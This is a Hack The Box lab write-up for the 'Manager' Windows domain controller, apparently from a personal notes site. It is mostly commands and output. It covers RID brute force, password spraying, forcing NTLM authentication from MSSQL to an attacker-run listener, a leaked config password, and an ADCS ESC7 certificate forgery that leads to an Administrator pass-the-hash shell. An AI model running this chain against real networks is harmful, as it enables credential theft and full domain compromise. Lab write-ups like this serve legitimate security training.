HTB | Manager

Machine - https://app.hackthebox.com/machines/Manager

IP - 10.10.11.236

NMAP

└─$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49689,49690,49693,49722,49795,49865 10.10.11.236 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-12 18:40 IST
Nmap scan report for 10.10.11.236
Host is up (0.55s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Manager
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-12 20:11:09Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
|_ssl-date: 2025-08-12T20:12:52+00:00; +7h00m05s from scanner time.
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
|_ssl-date: 2025-08-12T20:12:51+00:00; +7h00m05s from scanner time.
1433/tcp  open     ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.11.236:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-08-12T20:12:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-08-12T19:49:44
|_Not valid after:  2055-08-12T19:49:44
| ms-sql-info: 
|   10.10.11.236:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-12T20:12:52+00:00; +7h00m05s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
3269/tcp  open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-12T20:12:51+00:00; +7h00m05s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     mc-nmf        .NET Message Framing
49667/tcp open     msrpc         Microsoft Windows RPC
49689/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open     msrpc         Microsoft Windows RPC
49693/tcp open     msrpc         Microsoft Windows RPC
49722/tcp open     msrpc         Microsoft Windows RPC
49795/tcp open     msrpc         Microsoft Windows RPC
49865/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-08-12T20:12:17
|_  start_date: N/A
|_clock-skew: mean: 7h00m04s, deviation: 0s, median: 7h00m04s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 122.26 seconds

Port 80

SMB

                                                                                                                                                                                                                                                                             
┌──(anurag㉿anurag)-[~/htb/Manager/nmap]
└─$ netexec smb manager.htb -u '' -p ''
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.236    445    DC01             [+] manager.htb\\: 
                                                                                                                                                                                                                                                                             
┌──(anurag㉿anurag)-[~/htb/Manager/nmap]
└─$ netexec smb manager.htb -u '' -p '' --shares
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.236    445    DC01             [+] manager.htb\\: 
SMB         10.10.11.236    445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED

But I can validate via guest

└─$ netexec smb manager.htb -u 'guest' -p '' --shares          
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.236    445    DC01             [+] manager.htb\\guest: 
SMB         10.10.11.236    445    DC01             [*] Enumerated shares
SMB         10.10.11.236    445    DC01             Share           Permissions     Remark
SMB         10.10.11.236    445    DC01             -----           -----------     ------
SMB         10.10.11.236    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.236    445    DC01             C$                              Default share
SMB         10.10.11.236    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.236    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.11.236    445    DC01             SYSVOL                          Logon server share

Found username via RID Brute

└─$ netexec smb manager.htb -u 'guest' -p '' --rid-brute
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.236    445    DC01             [+] manager.htb\\guest: 
SMB         10.10.11.236    445    DC01             498: MANAGER\\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             500: MANAGER\\Administrator (SidTypeUser)
SMB         10.10.11.236    445    DC01             501: MANAGER\\Guest (SidTypeUser)
SMB         10.10.11.236    445    DC01             502: MANAGER\\krbtgt (SidTypeUser)
SMB         10.10.11.236    445    DC01             512: MANAGER\\Domain Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             513: MANAGER\\Domain Users (SidTypeGroup)
SMB         10.10.11.236    445    DC01             514: MANAGER\\Domain Guests (SidTypeGroup)
SMB         10.10.11.236    445    DC01             515: MANAGER\\Domain Computers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             516: MANAGER\\Domain Controllers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             517: MANAGER\\Cert Publishers (SidTypeAlias)
SMB         10.10.11.236    445    DC01             518: MANAGER\\Schema Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             519: MANAGER\\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             520: MANAGER\\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.236    445    DC01             521: MANAGER\\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             522: MANAGER\\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             525: MANAGER\\Protected Users (SidTypeGroup)
SMB         10.10.11.236    445    DC01             526: MANAGER\\Key Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             527: MANAGER\\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             553: MANAGER\\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.236    445    DC01             571: MANAGER\\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.236    445    DC01             572: MANAGER\\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.236    445    DC01             1000: MANAGER\\DC01$ (SidTypeUser)
SMB         10.10.11.236    445    DC01             1101: MANAGER\\DnsAdmins (SidTypeAlias)
SMB         10.10.11.236    445    DC01             1102: MANAGER\\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.236    445    DC01             1103: MANAGER\\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB         10.10.11.236    445    DC01             1113: MANAGER\\Zhong (SidTypeUser)
SMB         10.10.11.236    445    DC01             1114: MANAGER\\Cheng (SidTypeUser)
SMB         10.10.11.236    445    DC01             1115: MANAGER\\Ryan (SidTypeUser)
SMB         10.10.11.236    445    DC01             1116: MANAGER\\Raven (SidTypeUser)
SMB         10.10.11.236    445    DC01             1117: MANAGER\\JinWoo (SidTypeUser)
SMB         10.10.11.236    445    DC01             1118: MANAGER\\ChinHae (SidTypeUser)
SMB         10.10.11.236    445    DC01             1119: MANAGER\\Operator (SidTypeUser)
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Manager]
└─$ netexec smb manager.htb -u 'guest' -p '' --rid-brute | grep -i 'user' | sed -E 's/.*MANAGER\\\\([^ ]+).*/\\1/'
Administrator
Guest
krbtgt
Domain
Protected
DC01$
SQLServer2005SQLBrowserUser$DC01
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator

We can validate the username

└─$ ./kerbrute userenum --dc 10.10.11.236 -d manager.htb users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\\___/_/  /_.___/_/   \\__,_/\\__/\\___/                                        

Version: v1.0.3 (9dad6e1) - 08/12/25 - Ronnie Flathers @ropnop

2025/08/12 19:42:06 >  Using KDC(s):
2025/08/12 19:42:06 >   10.10.11.236:88

2025/08/12 19:42:06 >  [+] VALID USERNAME:       Zhong@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       ChinHae@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       Ryan@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       Administrator@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       Raven@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       Cheng@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       JinWoo@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       DC01$@manager.htb
2025/08/12 19:42:06 >  [+] VALID USERNAME:       Operator@manager.htb
2025/08/12 19:42:06 >  Done! Tested 10 usernames (9 valid) in 0.642 seconds

Well, with a valid list of users, we can try to perform an AS-REP Roasting attack. But we found nothing

└─$ impacket-GetNPUsers 'MANAGER.HTB/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.11.236               
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User Zhong doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Cheng doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Raven doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JinWoo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ChinHae doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Operator doesn't have UF_DONT_REQUIRE_PREAUTH set

Foothold/Shell

Shell as Raven

Password of the operator

I can do a quick check to see if any of the usernames I’ve collected use their username as their password.

└─$ netexec smb manager.htb -u users.txt -p lower_users.txt --continue-on-success --no-brute 
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.236    445    DC01             [-] manager.htb\\Administrator:administrator STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\\DC01$:dc01$ STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\\Zhong:zhong STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\\Cheng:cheng STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\\Ryan:ryan STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\\Raven:raven STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\\JinWoo:jinWoo STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\\ChinHae:chinHae STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [+] manager.htb\\Operator:operator

Well, let’s see where we can authenticate using the open ports returned by nmap :

└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto dc01.manager.htb -d manager.htb -u Operator -p  'operator'; echo; done
LDAP        10.10.11.236    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
LDAP        10.10.11.236    389    DC01             [+] manager.htb\\Operator:operator 

SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.236    445    DC01             [+] manager.htb\\Operator:operator 

MSSQL       10.10.11.236    1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL       10.10.11.236    1433   DC01             [+] manager.htb\\Operator:operator 

WINRM       10.10.11.236    5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.236    5985   DC01             [-] manager.htb\\Operator:operator

Bloodhound

└─$ bloodhound-python -u 'Operator' -p 'operator' -d manager.htb -ns 10.10.11.236 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: manager.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.manager.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.manager.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.manager.htb
INFO: Done in 01M 33S
INFO: Compressing output into 20250813030440_bloodhound.zip

MSSQL

└─$ impacket-mssqlclient manager.htb/Operator:'operator'@10.10.11.236 -windows-auth                            
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (MANAGER\\Operator  guest@master)>

Let’s enum databases

SQL (MANAGER\\Operator  guest@master)> SELECT name FROM master..sysdatabases;
name     
------   
master   

tempdb   

model    

msdb     

SQL (MANAGER\\Operator  guest@master)>

All four are default MSSQL databases. xp_cmd is disabel but xp_dir is not

SQL (MANAGER\\Operator  guest@master)> xp_cmdshell whoami
ERROR(DC01\\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (MANAGER\\Operator  guest@master)> xp_dirtree C:\\
subdirectory                depth   file   
-------------------------   -----   ----   
$Recycle.Bin                    1      0   

Documents and Settings          1      0   

inetpub                         1      0   

PerfLogs                        1      0   

Program Files                   1      0   

Program Files (x86)             1      0   

ProgramData                     1      0   

Recovery                        1      0   

SQL2019                         1      0   

System Volume Information       1      0   

Users                           1      0   

Windows                         1      0   

SQL (MANAGER\\Operator  guest@master)>

We can try to catch NTLM via Responder

SQL (MANAGER\\Operator  guest@master)> xp_dirtree \\\\10.10.16.7\\test
subdirectory   depth   file   
------------   -----   ----   
SQL (MANAGER\\Operator  guest@master)>

[SMB] NTLMv2-SSP Client   : 10.10.11.236
[SMB] NTLMv2-SSP Username : MANAGER\\DC01$
[SMB] NTLMv2-SSP Hash     : DC01$::MANAGER:88d1619622c7a870:C312956F03ACD2CC3E1374EDD11BC718:010100000000000080869658020CDC01435F5CD3D0EFE97F0000000002000800430033003400310001001E00570049004E002D00440037005100370033004E004100490036004400320004003400570049004E002D00440037005100370033004E00410049003600440032002E0043003300340031002E004C004F00430041004C000300140043003300340031002E004C004F00430041004C000500140043003300340031002E004C004F00430041004C000700080080869658020CDC01060004000200000008003000300000000000000000000000003000006F6F1816302A91BC1DA517B955C1C4A1927B56E4B7B65B32D46FBA23628A583E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0037000000000000000000

Not able to crack it

Raven’s cred

We found an old zip file

SQL (MANAGER\\Operator  guest@master)> xp_dirtree C:\\inetpub\\wwwroot
subdirectory                      depth   file   
-------------------------------   -----   ----   
about.html                            1      1   

contact.html                          1      1   

css                                   1      0   

images                                1      0   

index.html                            1      1   

js                                    1      0   

service.html                          1      1   

web.config                            1      1   

website-backup-27-07-23-old.zip       1      1   

SQL (MANAGER\\Operator  guest@master)>

Since it is in the root folder, we can wget it

└─$ wget <http://10.10.11.236/website-backup-27-07-23-old.zip>                                                                      
--2025-08-13 03:32:58--  <http://10.10.11.236/website-backup-27-07-23-old.zip>
Connecting to 10.10.11.236:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’

website-backup-27-07-23-old.zip                                     100%[=================================================================================================================================================================>]   1021K   360KB/s    in 2.8s    

2025-08-13 03:33:01 (360 KB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]

in .old-conf.xml file we fund raven’s cred

└─$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>">
   <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
         <user>raven@manager.htb</user>
         <password>R4v3nBe5tD3veloP3r!123</password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
   </server>
   <search type="full">
      <dir-list>
         <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
   </search>
</ldap-conf>

Let’s check what permission we have with new creds

└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto dc01.manager.htb -d manager.htb -u raven -p  'R4v3nBe5tD3veloP3r!123'; echo; done
LDAP        10.10.11.236    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
LDAP        10.10.11.236    389    DC01             [+] manager.htb\\raven:R4v3nBe5tD3veloP3r!123 

SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.236    445    DC01             [+] manager.htb\\raven:R4v3nBe5tD3veloP3r!123 

MSSQL       10.10.11.236    1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL       10.10.11.236    1433   DC01             [+] manager.htb\\raven:R4v3nBe5tD3veloP3r!123 

WINRM       10.10.11.236    5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.236    5985   DC01             [+] manager.htb\\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!)

found user.txt

*Evil-WinRM* PS C:\\Users\\Raven\\Desktop> dir

    Directory: C:\\Users\\Raven\\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/12/2025  12:50 PM             34 user.txt

Privilege Escalation

Shell as Administrator

ADCS — ESC 7

└─$ certipy find -u raven -p 'R4v3nBe5tD3veloP3r!123' -target 10.10.11.236 -text -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'manager-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'manager-DC01-CA'
[*] Checking web enrollment for CA 'manager-DC01-CA' @ 'dc01.manager.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : MANAGER.HTB\\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\\Operator
                                          MANAGER.HTB\\Authenticated Users
                                          MANAGER.HTB\\Raven
        ManageCa                        : MANAGER.HTB\\Administrators
                                          MANAGER.HTB\\Domain Admins
                                          MANAGER.HTB\\Enterprise Admins
                                          MANAGER.HTB\\Raven
        ManageCertificates              : MANAGER.HTB\\Administrators
                                          MANAGER.HTB\\Domain Admins
                                          MANAGER.HTB\\Enterprise Admins
    [+] User Enrollable Principals      : MANAGER.HTB\\Authenticated Users
                                          MANAGER.HTB\\Raven
    [+] User ACL Principals             : MANAGER.HTB\\Raven
    [!] Vulnerabilities
      ESC7                              : User has dangerous permissions.
Certificate Templates                   : [!] Could not find any certificate templates

ESC7 addresses vulnerabilities arising from an attacker obtaining highly privileged permissions directly on a CA object within AD CS or on the CA service itself. These permissions grant significant control over the CA's operations and security.

The two primary permissions of concern are:

Manage CA (CA Administrator/ManageCa): This permission grants extensive control over the CA, including the ability to modify its configuration (e.g., which certificate templates are published), assign CA roles (including Certificate Manager/Officer, if needed), start/stop the CA service, and manage CA security. This is the core permission that ESC7 often revolves around.
Manage Certificates (Certificate Manager/Officer): This permission allows a user to approve or deny pending certificate requests and to revoke issued certificates.

Step 1: (If needed, as facilitated by Manage CA) Ensure capability to approve requests.

└─$ certipy ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -add-officer 'raven'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'

This command uses the Manage CA privilege to add 'attacker' to the officer role.

Step 2: (If needed) Ensure the SubCA template is enabled on the CA.

└─$ certipy ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -enable-template 'SubCA'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'

This command uses Manage CA to make the SubCA template available for requests.

Step 3: Submit a certificate request using the SubCA template (expected to fail initially if no direct enrollment rights).

└─$ certipy req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -template 'SubCA' -upn 'administrator@manager.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 20
[-] Got error while requesting certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
Would you like to save the private key? (y/N): y
[*] Saving private key to '20.key'
[*] Wrote private key to '20.key'
[-] Failed to request certificate

We got the error but Note the Request ID (e.g., 1) and that the private key was saved (e.g., to 1.key).

Step 4: Approve the pending request.

└─$ certipy ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -issue-request '20'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate request ID 20

Step 5: Retrieve the issued certificate

└─$ certipy req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -retrieve '20'                                    
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Retrieving certificate with ID 20
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '20.key'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

The attacker now possesses administrator.pfx, a certificate for the Administrator account. This can be used with certipy auth -pfx administrator.pfx ... to authenticate and gain privileged access.

Now we can get the hash

└─$ certipy auth  -dc-ip '10.10.11.236' -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@manager.htb'
[*] Using principal: 'administrator@manager.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

Since we have the hash we can get the shell and root.txt

└─$ evil-winrm -i manager.htb -u administrator -H ae5064c2f62317332c88629e025924ef
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> cd ..\\Desktop
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> dir

    Directory: C:\\Users\\Administrator\\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/12/2025  12:50 PM             34 root.txt

PreviousHTB | Vintage NextHTB | Analysis

Last updated 1 month ago